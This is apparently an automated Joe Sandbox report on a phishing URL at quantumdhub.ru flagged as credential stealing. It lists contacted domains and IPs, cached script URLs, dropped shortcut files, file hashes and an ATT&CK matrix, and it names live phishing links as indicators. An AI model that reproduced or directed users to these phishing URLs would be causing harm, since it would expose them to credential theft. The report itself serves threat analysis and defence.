Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
gadk.quantumdhub.ru
104.21.80.1
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.66.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru
            172.67.158.68
            truefalse
              unknown
              publisher.liveperson.net
              34.120.154.120
              truefalse
                high
                dh1y47vf5ttia.cloudfront.net
                18.66.161.117
                truefalse
                  unknown
                  www.google.com
                  172.217.19.228
                  truefalse
                    high
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                      52.212.192.25
                      truefalse
                        high
                        msftenterprise.sc.omtrdc.net
                        63.140.62.17
                        truefalse
                          high
                          lpcdn.lpsnmedia.net
                          unknown
                          unknownfalse
                            high
                            js.monitor.azure.com
                            unknown
                            unknownfalse
                              high
                              accdn.lpsnmedia.net
                              unknown
                              unknownfalse
                                high
                                assets.adobedtm.com
                                unknown
                                unknownfalse
                                  high
                                  mscom.demdex.net
                                  unknown
                                  unknownfalse
                                    high
                                    static-assets.fs.liveperson.com
                                    unknown
                                    unknownfalse
                                      high
                                      cm.everesttech.net
                                      unknown
                                      unknownfalse
                                        high
                                        play.vidyard.com
                                        unknown
                                        unknownfalse
                                          high
                                          cdn.botframework.com
                                          unknown
                                          unknownfalse
                                            high
                                            login.microsoftonline.com
                                            unknown
                                            unknownfalse
                                              high
                                              lptag.liveperson.net
                                              unknown
                                              unknownfalse
                                                high
                                                dpm.demdex.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                    high
                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                      high
                                                      https://mscom.demdex.net/dest5.html?d_nsid=0false
                                                        high
                                                        https://gadk.quantumdhub.ru/favicon.icofalse
                                                          unknown
                                                          https://qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru/ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXWfalse
                                                            unknown
                                                            https://static-assets.fs.liveperson.com/microsoft/lp_ada_enhancements-prod.jsfalse
                                                              high
                                                              https://a.nel.cloudflare.com/report/v4?s=4Zs16ks2siptKF0TTTImZcm1g8hmLIveGGK5ITF%2FStCvWAItQyCIHNRek7Du8k5yIEIQ8yqHdqLRiNw7ijlbbW6s48H58bHYSbVtsLqb8dlqa%2FQgnM7j7qPyOl4tAA%3D%3Dfalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f53738f5cfa15bb/1734737757657/266c2338cf1da0c0197c76b0ce5e22a9a128cea85378c77008f8b5687810be47/iRJ4oKYtIhGUez2false
                                                                  high
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                    high
                                                                    https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                                      high
                                                                      https://dpm.demdex.net/id?d_visid_ver=4.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=EA76ADE95776D2EC7F000101%40AdobeOrg&d_nsid=0&ts=1734737818811false
                                                                        high
                                                                        https://msftenterprise.sc.omtrdc.net/id?d_visid_ver=4.4.0&d_fieldgroup=A&mcorgid=EA76ADE95776D2EC7F000101%40AdobeOrg&mid=65955960084563645340280706213568852788&ts=1734737820889false
                                                                          high
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f53738f5cfa15bb&lang=autofalse
                                                                            high
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/false
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://github.com/mozilla/rhino/issues/346chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                high
                                                                                https://login.microsoftonline.com/uxlogout?appidchromecache_330.2.drfalse
                                                                                  high
                                                                                  https://tc39.es/ecma262/#sec-toobjectchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                    high
                                                                                    https://aka.ms/PBI_Comm_Overviewchromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                      high
                                                                                      https://github.com/carhartl/jquery-cookiechromecache_283.2.dr, chromecache_168.2.drfalse
                                                                                        high
                                                                                        https://tc39.es/ecma262/#sec-object.getownpropertydescriptorchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                          high
                                                                                          https://github.com/zloirock/core-jschromecache_282.2.dr, chromecache_191.2.dr, chromecache_305.2.dr, chromecache_192.2.drfalse
                                                                                            high
                                                                                            https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePasschromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                              high
                                                                                              https://login.microsoftonline.com/savedusers?appidchromecache_224.2.dr, chromecache_330.2.drfalse
                                                                                                high
                                                                                                https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerablechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                  high
                                                                                                  https://tc39.es/ecma262/#sec-array.prototype.includeschromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                    high
                                                                                                    https://checkout.office.com/acquire/purchase/chromecache_166.2.drfalse
                                                                                                      high
                                                                                                      https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.min.jschromecache_166.2.drfalse
                                                                                                        high
                                                                                                        https://tc39.es/ecma262/#sec-object.setprototypeofchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                          high
                                                                                                          https://tc39.es/ecma262/#sec-hasownpropertychromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                            high
                                                                                                            https://outlook.live.com/owa/?nlp=1chromecache_180.2.dr, chromecache_240.2.drfalse
                                                                                                              high
                                                                                                              https://va.idp.liveperson.netchromecache_166.2.drfalse
                                                                                                                high
                                                                                                                https://cdn.jsdelivr.net/npm/bluebirdchromecache_329.2.dr, chromecache_249.2.drfalse
                                                                                                                  high
                                                                                                                  https://github.com/scottjehl/picturefill/blob/master/Authors.txt;chromecache_302.2.drfalse
                                                                                                                    high
                                                                                                                    http://www.javascripter.net/faq/browsern.htmchromecache_178.2.drfalse
                                                                                                                      unknown
                                                                                                                      https://tc39.es/ecma262/#sec-tointegerorinfinitychromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                        high
                                                                                                                        https://dc.services.visualstudio.comchromecache_311.2.dr, chromecache_314.2.drfalse
                                                                                                                          high
                                                                                                                          https://tc39.es/ecma262/#sec-requireobjectcoerciblechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/w3c/aria-practices/pull/1757chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                              high
                                                                                                                              https://axios-http.comchromecache_197.2.dr, chromecache_308.2.drfalse
                                                                                                                                high
                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.jschromecache_172.2.dr, chromecache_199.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.microsoftstore.com.cn/chromecache_166.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://keycode.info/table-of-all-keycodeschromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://tc39.es/ecma262/#sec-getmethodchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://va.msg.liveperson.netchromecache_166.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.skype.com/en/chromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Valueschromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/axios/axios/issueschromecache_197.2.dr, chromecache_308.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_7chromecache_166.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://jquery.com/chromecache_321.2.dr, chromecache_296.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://stores.office.com/subscription/acquirechromecache_166.2.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://tc39.es/ecma262/#sec-array.prototype.indexofchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://tc39.es/ecma262/#sec-tolengthchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://signup.azure.com/chromecache_166.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://breeze.aimon.applicationinsights.iochromecache_311.2.dr, chromecache_314.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schema.org/Organizationchromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://sizzlejs.com/chromecache_321.2.dr, chromecache_296.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://js.foundation/chromecache_321.2.dr, chromecache_296.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.netchromecache_162.2.dr, chromecache_260.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePasschromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://bugzil.la/548397chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://tc39.es/ecma262/#sec-lengthofarraylikechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://mcraa.fs.liveperson.com/messaging-agent-availability/api/account/60270350/getSkillAvailabilichromecache_166.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://signup-staging.azure.com/chromecache_166.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aecchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://tc39.es/ecma262/#sec-iscallablechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://scottjehl.github.io/picturefillchromecache_257.2.dr, chromecache_302.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://signup-local.azure.com/chromecache_166.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://tc39.es/ecma262/#sec-object.definepropertychromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://microsoftit.pkgs.visualstudio.com/OneITVSO/_packaging/CSM-SITES-AEMFoundations/npm/registry/chromecache_197.2.dr, chromecache_308.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://tc39.es/ecma262/#sec-math.truncchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://bugs.chromium.org/p/v8/issues/detail?id=12006chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://dc-int.services.visualstudio.comchromecache_311.2.dr, chromecache_314.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://bugzilla.mozilla.org/show_bug.cgi?id=277178chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://github.com/tc39/proposal-error-causechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=308064chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://stores.office.com/chromecache_166.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://play.vidyard.com/embed/v4.jschromecache_272.2.dr, chromecache_187.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://aka.ms/28808chromecache_166.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://github.com/requirejs/almond/LICENSEchromecache_319.2.dr, chromecache_275.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://github.com/scottjehl/picturefill/tree/3.0/src/plugins/gecko-picturechromecache_257.2.dr, chromecache_302.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://github.com/microsoft/BotFramework-WebChat/issues/2119chromecache_290.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://login.microsoftonline.com/forgetuserchromecache_224.2.dr, chromecache_330.2.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://github.com/zloirock/core-js/blob/v3.30.1/LICENSEchromecache_282.2.dr, chromecache_305.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0chromecache_309.2.dr, chromecache_251.2.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://tc39.es/ecma262/#sec-toprimitivechromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://github.com/nevware21/ts-asyncchromecache_268.2.dr, chromecache_278.2.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://scottjehl.github.io/picturefill/chromecache_257.2.dr, chromecache_302.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://github.com/axios/axios.gitchromecache_197.2.dr, chromecache_308.2.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://www.javascriptkit.com/dhtmltutors/cssmediaqueries3.shtmlchromecache_178.2.drfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://tc39.es/ecma262/#sec-topropertykeychromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://dev.azure.com/mscomdev/Moray/_workitems/edit/4494chromecache_192.2.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://github.com/zloirock/core-js/blob/v3.25.0/LICENSEchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://aka.ms/yourcaliforniaprivacychoiceschromecache_187.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://checkout.office.com/acquire/purchasechromecache_166.2.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://jquery.org/licensechromecache_321.2.dr, chromecache_296.2.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://bugs.chromium.org/p/v8/issues/detail?id=3334chromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://tc39.es/ecma262/#sec-object.getownpropertynameschromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://javascript.info/size-and-scroll-window#width-height-of-the-documentchromecache_191.2.dr, chromecache_192.2.drfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                          172.217.19.228
                                                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                          104.18.94.41
                                                                                                                                                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                          104.21.80.1
                                                                                                                                                                                                                                                          gadk.quantumdhub.ruUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                          151.101.130.137
                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                          151.101.66.137
                                                                                                                                                                                                                                                          code.jquery.comUnited States
                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                          35.190.80.1
                                                                                                                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                          104.21.73.56
                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                          52.212.192.25
                                                                                                                                                                                                                                                          dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                          104.17.24.14
                                                                                                                                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                          18.66.161.117
                                                                                                                                                                                                                                                          dh1y47vf5ttia.cloudfront.netUnited States
                                                                                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                          172.67.158.68
                                                                                                                                                                                                                                                          qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ruUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                          104.18.95.41
                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                          52.210.126.164
                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                          52.210.83.154
                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                          63.140.62.17
                                                                                                                                                                                                                                                          msftenterprise.sc.omtrdc.netUnited States
                                                                                                                                                                                                                                                          15224OMNITUREUSfalse
                                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                          192.168.2.5
                                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                          Analysis ID:1579178
                                                                                                                                                                                                                                                          Start date and time:2024-12-21 00:34:44 +01:00
                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                          Overall analysis duration:0h 3m 20s
                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                          Sample URL:https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                          Classification:mal56.win@22/268@68/17
                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.164.84, 142.250.181.142, 199.232.214.172, 192.229.221.95, 20.233.12.48, 23.195.61.233, 2.16.158.27, 2.16.158.42, 172.217.17.35, 152.199.19.160, 151.101.1.181, 151.101.65.181, 151.101.129.181, 151.101.193.181, 52.168.112.67, 34.120.154.120, 178.249.97.23, 23.218.208.236, 52.167.30.171, 20.190.177.146, 20.190.177.82, 20.190.147.9, 20.190.177.20, 20.190.177.83, 20.190.177.19, 20.190.177.148, 20.190.147.8, 178.249.97.99, 54.75.138.108, 34.255.155.228, 34.252.214.6, 2.20.62.163, 172.202.163.200, 13.107.246.63, 4.175.87.197
                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): bot-framework.azureedge.net, greenid-prod-pme.eastus2.cloudapp.azure.com, bot-framework.ec.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, ak.privatelink.msidentity.com, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, powerbi-publicip-uaenorth.uaenorth.cloudapp.azure.com, star-azurefd-prod.trafficmanager.net, update.googleapis.com, san-ion.secure4.scene7.com.edgekey.net, fpt2.microsoft.com, fs.microsoft.com, aadcdnoriginwus2.azureedge.net, cm.everesttech.net.akadns.net, aadcdn.msauth.net, edgedl.me.gvt1.com, powerbi.microsoft.com, onedscolprdeus04.eastus.cloudapp.azure.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, fpt.microsoft.com, powerbi-global.trafficmanager.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, redirector.gvt1.com, login.mso.ms
                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                          • VT rate limit hit for: https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                                                                                                                                                                                                          No simulations
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 22:35:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                          Entropy (8bit):3.9756578618087195
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8KdITsUQHlidAKZdA19ehwiZUklqeh2y+3:89PiBy
                                                                                                                                                                                                                                                          MD5:A5BC0129C97CF8C9632094BCCE15E64F
                                                                                                                                                                                                                                                          SHA1:669F823220227B62D48B8CDF8DB41FF2BC2D18EC
                                                                                                                                                                                                                                                          SHA-256:31E73256DD964E8D4556B3A3EA5ED82D8CE05459FA5942A42FB6504BC116A095
                                                                                                                                                                                                                                                          SHA-512:6B67FEB9FCC97348828A3D5C422F3A92058630D9612CAB1BF99BC8A543016B9BC95DEF05313A42B8BB003CDDDF8D312409FB2DDE5AF4AEC410EF020E4D58D72E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
